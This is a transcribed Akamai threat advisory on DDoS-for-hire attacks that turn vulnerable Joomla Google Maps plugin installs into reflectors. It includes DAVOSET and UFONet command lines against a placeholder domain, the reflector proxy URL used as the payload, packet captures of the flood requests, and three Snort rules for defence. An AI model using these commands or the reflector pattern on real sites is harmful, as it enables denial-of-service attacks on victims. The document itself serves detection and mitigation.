1.1 OVERVIEW - SC Magazine

Transcription

1.1 OVERVIEW - SC Magazine
1
akamai’s [state of the internet] / threat advisory
TLP: GREEN GSI ID: 1085 JOOMLA REFLECTION DDOS-FOR-HIRE
RISK FACTOR - HIGH
1.1 / OVERVIEW / Following a series of vulnerability disclosures throughout 2014, the
popular content management framework Joomla has been actively targeted for exploitation
by malicious actors. These exploitation campaigns usually pursue the compromise and
entrenchment of large numbers of servers, or Software-as-a-Service (SaaS) providers,
that can then be used to distribute malware and phishing campaigns or can be used
to serve as zombies in distributed denial of service (DDoS) botnets. In 2014, PLXsert
published a white paper on how vulnerable web frameworks are used for botnet building.
In a recent joint investigation with the PhishLabs R.A.I.D (Research, Analysis and
Intelligence Division), PLXsert observed traffic signatures from Joomla distributions used
in DDoS attacks. The attack campaigns contain traffic signatures that match sites known
for providing DDoS-for-hire services. The traffic appears to match attacks staged using
tools developed specifically to abuse XML and Open Redirect functions, which then
produce a reflected response that can be directed to targeted victims and result in denial
of service. These tools are rapidly gaining popularity and are being adapted by the DDoSfor-hire market.
Observed attack traffic and data suggest vulnerable hosts are being added to the menu of
attacks on known DDoS-for-hire sites. The new attack type uses compromised Joomla
servers as zombies or proxies to stage denial of service GET floods.
1.2 / INDICATORS / With cooperation from the PhishLabs R.A.I.D, PLXsert matched
signature traffic originating from multiple Joomla sites. It varies slightly depending on the
reflector used, due to configuration details.
In February 2014, multiple vulnerabilities were discovered in the Google Maps plugin for
Joomla. One of the vulnerabilities allows the plugin to act as a proxy. Vulnerable
installations are being used en masse for reflected floods using tools such as DAVOSET
and UFONet.
1.2A / DAVOSET ATTACK TOOL / A publicly available tool called DAVOSET (DDoS
attacks via other sites execution tool), was built to take advantage of these types of attacks
and automates the process. For attackers, the most difficult task is building and
maintaining a valid list of vulnerable reflectors. However DAVOSET ships with a default
list of servers that leverage the vulnerability of the Google Maps plugin.
DAVOSET takes a list of known blind proxy scripts and services and uses them to stage a
reflected GET flood against a target. DAVOSET allows an attacker to configure their lists
1 1
2
akamai’s [state of the internet] / threat advisory
of reflectors, the number of requests per reflector, and proxy configurations to automate
these attacks. Figure 1 shows DAVOSET being used to stage an attack against a target
using Joomla reflectors.
# ./davoset.pl l=list_test.txt u=http://domain.com
DDoS attacks via other sites execution tool
DAVOSET v.1.2.3
Copyright (C) MustLive 2010-2014
Site http://domain.com is attacking by ZZ zombie-servers…
1
2
…
ZZ
Attack has been conducted.
Time: 1:-54:47.
Requests: ZZ, Bytes: 10913.
Speed: 0.14496 req/s, 26.81327 B/s.
Figure 1: DAVOSET in use to stage an attack against a target using multiple Joomla reflectors Malicous actors also find reflectors by dorking (advanced search techniques) or scanning.
PLXsert was able to identify more than 150,000 potential reflectors, although many appear
to have been patched or updated, locked down via PHP or server configuration hardening,
or had removed the plugin.
1.2B / UFONET ATTACK TOOL / More recently, another tool available on the Internet called
UFONet has received attention. As with DAVOSET, it uses a web interface and a pointand-click configuration process. These user-friendly features provide attackers with an
easy-to-use interface for proxy (e.g. Tor) configuration, customizable headers, attack
options and more. Figure 2 illustrates how an attack works with a proxy, and Figure 3
shows the tool's interface.
Figure 2: How a UFOnet attack works with a proxy (SourceForge) 2 2
3
akamai’s [state of the internet] / threat advisory
Figure 3: The UFONet web interface allows users to quickly configure and launch DDoS attacks The next figure provides sample output for the command-line version of UFONet.
This was tested within PLXsert’s lab environment.
3 3
4
akamai’s [state of the internet] / threat advisory
# ./main.py -a ‘http://domain.com’
===========================================================================
888
888
888
888
888
888
888
888
888
888
888
888
Y88b. .d88P
'Y88888P'
8888888888 .d88888b.
888
d88PY888b
888
888
888
8888888
888
888
888
888
888
888
888
888
888
Y88b..d88P
888
'Y88888P'
888b
888
888
8888b
888
888
88888b 888
888
888 Y88b 888 .d88b. 888888
888 Y88b888 d8P Y8b 888
888 Y88888 88888888 888
888
Y8888 Y8b.
Y88b.
888
Y888
'Y8888 'Y8888
UFONet - DDoS attacks via Web Abuse - by psy
===========================================================================
Attacking: http://domain.com
=======================================================
=====================
Round: 'Is target up?'
=====================
From here: YES
--------------------From exterior: NO | WARNING: Check failed from external services ;(
--------------------=============================================
Zombie: 1 | Round: 1 | Total Rounds: 100
=============================================
Name: reflector.com
Payload: http://reflector.com/plugins/system/plugin_googlemap2_proxy.php?url=domain.com
Status: Hit!
---------...
=====================
Total hits: XXX
=====================
[INFO] - Attack completed! ;-)
Figure 4: The UFONet command line interface is used to stage an attack using vulnerable Joomla installs UFONet also automates the process to find and test vulnerable reflectors, and supports
community-based list sharing and updating, which will likely serve to escalate the
popularity and scale of these attacks over time.
At the time of this advisory, UFONet had a very small set of community reflectors and its
search and reflector testing logic contained bugs. This made finding vulnerable Joomla
instances more difficult. It was, however, functional in administering the attack with minor
modifications when given a list of reflectors acquired externally.
1.3 / MALICIOUS PAYLOADS / PLXsert identified three distinct signatures produced by the
DAVOSET and UFONet tools. They differ in the type of HTTP GET request header (1.0,
1.1) and the presence of the PHP language version in the User-Agent field. An extra line
4 4
5
akamai’s [state of the internet] / threat advisory
break after the last header in each packet is part of the observed request. These signature
details are shown in Figure 5.
Variant 1: HTTP GET / HTTP/1.1
15:54:54.765846 IP X.X.X.X.57361 > Y.Y.Y.Y.80: Flags [P.], seq 0:103, ack 1, win 14600,
length 103
.........P....P-..P.9.fj..GET / HTTP/1.1
Host: <redacted>
Accept: */*
Content-type: text/xml
Content-length: 0
-----------------------------------------------------------------------------------------------------------------Variant 2: HTTP GET /HTTP/1.0
15:52:11.894262 IP X.X.X.X.36234 > Y.Y.Y.Y.80: Flags [P.], seq 0:47, ack 1, win 4380,
length 47
....E..W.y@....~.k.e.......P..z`S.{-P....2..GET / HTTP/1.0
Host: <redacted>
-----------------------------------------------------------------------------------------------------------------Variant 3: User-Agent: PHP/(version)
15:52:06.824558 IP X.X.X.X.43280 > Y.Y.Y.Y.80: Flags [P.], seq 0:84, ack 1, win 14600,
length 84
....E..|[email protected].\...&b.......PE.i...c.P.9..}..GET / HTTP/1.1
User-Agent: PHP/5.3.25 <== version varies depending on source of request
Host: <redacted>
Accept: */*
Figure 5: Three attack payload traffic samples show GET Flood requests used during DDoS attacks The HTTP headers vary due to the server configuration and versions of the plugin. Some
requests are issued using curl_exec() via PHP, and others are file_get_contents() calls.
One variation is the use of HTTP/1.0 for requests. HTTP/1.1 has been the more popular
standard since its introduction in 1999. Newer browsers since Internet Explorer 6.0 have
standardized on HTTP/1.1, as have tools such as curl and wget.
Another trait in these signatures is the lack of a User-Agent HTTP header in a majority of
the requests. However some boxes that use the PHP curl request include a User-Agent
string that contains the PHP version used by the curl_exec() request.
1.4 / OBSERVED CAMPAIGN / The signatures of this attack have been observed since
September 2014. So far in 2015, eight attacks against Akamai customers have contained the
Joomla! attack signatures. Figure 6 contains a sample of the signatures observed during
active attack campaigns.
5 5
6
akamai’s [state of the internet] / threat advisory
16:16:27.077346 IP X.X.X.X > Y.Y.Y.Y: Flags [P.], seq 0:95, ack 1, win 46, length 95
[email protected].(...xP.......GET / HTTP/1.1
Host: <redacted>
Accept: */*
Content-type: text/xml
Content-length: 0
16:17:29.100358 IP X.X.X.X > Y.Y.Y.Y: P 0:76(76) ack 1 win 115
[email protected]?&...d...P.P1.o|.bP..s....GET / HTTP/1.1
User-Agent: PHP/5.3.29
Host: <redacted>
Accept: */*
Figure 6: GET flood requests observed during DDoS attacks against Akamai customers As seen in Figure 7, malicious actors usually launch these attacks in combination with
other attack vectors. In fact, only one attack launched on January 14, 2015 consisted of the
Joomla! GET flood alone. Application attacks like this aren’t known to generate significant
bandwidth – the goal of the attack is to generate realistic user connections on the target
server to cause a denial of service.
Figure 7: Dates, peak bandwidth and total vectors per attack 1.4A / ATTACK DISTRIBUTION / The majority of the top attacking IP addresses that
participated on this DDoS attack originated from Germany as shown in Figure 8.
6 6
7
akamai’s [state of the internet] / threat advisory
Figure 8: Top countries hosting abused Joomla! servers The attacks were mostly focused in the Education vertical. Figure 9 provides a breakdown
of the remaining attack target verticals.
Figure 9: Number of attacks by industry 1.5 / DDOS MITIGATION / PLXsert has identified the following three DDoS mitigation
procedures that can help mitigate this attack vector. These recommendations are by no
means exhaustive and should not be taken as a sole means of DDoS protection.
•
Block HTTP GET /1.0 request traffic if support for legacy clients is not needed.
•
Block HTTP requests with a PHP-based User-Agent string if they are not needed.
•
Use the three Snort rules provided in Figure 10. The signature can be adapted to
other mitigation techniques in order to detect or block these DDoS attacks.
7 7
8
akamai’s [state of the internet] / threat advisory
alert TCP $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS \
(msg: "Joomla GET flood"; \
flow: to_server; \
content: !"User-Agent\:"; dsize:<128; \
content: "GET / HTTP/1.1"; depth:14; \
content: "Host\: "; distance:2; within:6; \
content: "Accept\: */*"; distance:2; within:56; \
content: "Content-type\: text/xml"; distance:2; within:22; \
content: "Content-length\: 0"; distance:2; within:17; \
content: "|0d0a 0d0a|"; distance:0; within:4;\
classtype: GET-Flood; \
sid:201500001; rev:1;)
alert TCP $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS \
(msg: "Joomla GET flood PHP UA"; \
flow: to_server; \
content: "GET / HTTP/1.1"; depth:14; dsize:<109; \
content: "User-Agent\: PHP/5."; distance:2; within:18; \
content: "Host\: "; distance:5; within:7; \
content: "Accept\: */*"; distance:2; within:56; \
content: "|0d0a 0d0a|"; distance:0; within:4;\
classtype: GET-Flood; \
sid:201500002; rev:1;)
alert TCP $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS \
(msg: "Joomla GET flood missing headers"; \
flow: to_server; \
content: !"User-Agent\:"; dsize:<72; \
content: "GET / HTTP/1.0"; depth:14; \
content: "Host\: "; distance:2; within:6; \
content: "|0d0a 0d0a|"; distance:0; within:45;\
classtype: GET-Flood; \
sid:201500003; rev:1;)
Figure 10: Three Snort rules to match the three attack variations 8 8
akamai’s [state of the internet] / threat advisory
The Prolexic Security Engineering and Research Team (PLXsert) monitors malicious cyber threats globally and analyzes these attacks using proprietary techniques and equipment.
Through research, digital forensics and post-event analysis, PLXsert is able to build a global view of security threats, vulnerabilities and trends, which is shared with customers and the
security community. By identifying the sources and associated attributes of individual attacks, along with best practices to identify and mitigate security threats and vulnerabilities, PLXsert
helps organizations make more informed, proactive decisions.
Akamai® is a leading provider of cloud services for delivering, optimizing and securing online content and business applications. At the core of the company’s solutions is the Akamai
Intelligent Platform™ providing extensive reach, coupled with unmatched reliability, security, visibility and expertise. Akamai removes the complexities of connecting the increasingly
mobile world, supporting 24/7 consumer demand, and enabling enterprises to securely leverage the cloud. To learn more about how Akamai is accelerating the pace of innovation in a
hyperconnected world, please visit www.akamai.com or blogs.akamai.com, and follow @Akamai on Twitter.
Akamai is headquartered in Cambridge, Massachusetts in the United States with operations in more than 40 offices around the world. Our services and renowned customer care enable
businesses to provide an unparalleled Internet experience for their customers worldwide. Addresses, phone numbers and contact information for all locations are listed on
www.akamai.com/locations
©2015 Akamai Technologies, Inc. All Rights Reserved. Reproduction in whole or in part in any form or medium without express written permission is prohibited. Akamai and the Akamai
wave logo are registered trademarks. Other trademarks contained herein are the property of their respective owners. Akamai believes that the information in this publication is accurate as
of its publication date; such information is subject to change without notice. Published 02/25.
9 

Similar documents

1 akamai`s [state of the internet] / Threat Advisory 1.1 OVERVIEW

1 akamai`s [state of the internet] / Threat Advisory 1.1 OVERVIEW Through research, digital forensics and post-event analysis, PLXsert is able to build a global view of security threats, vulnerabilities and trends, which is shared with customers and the security ...

More information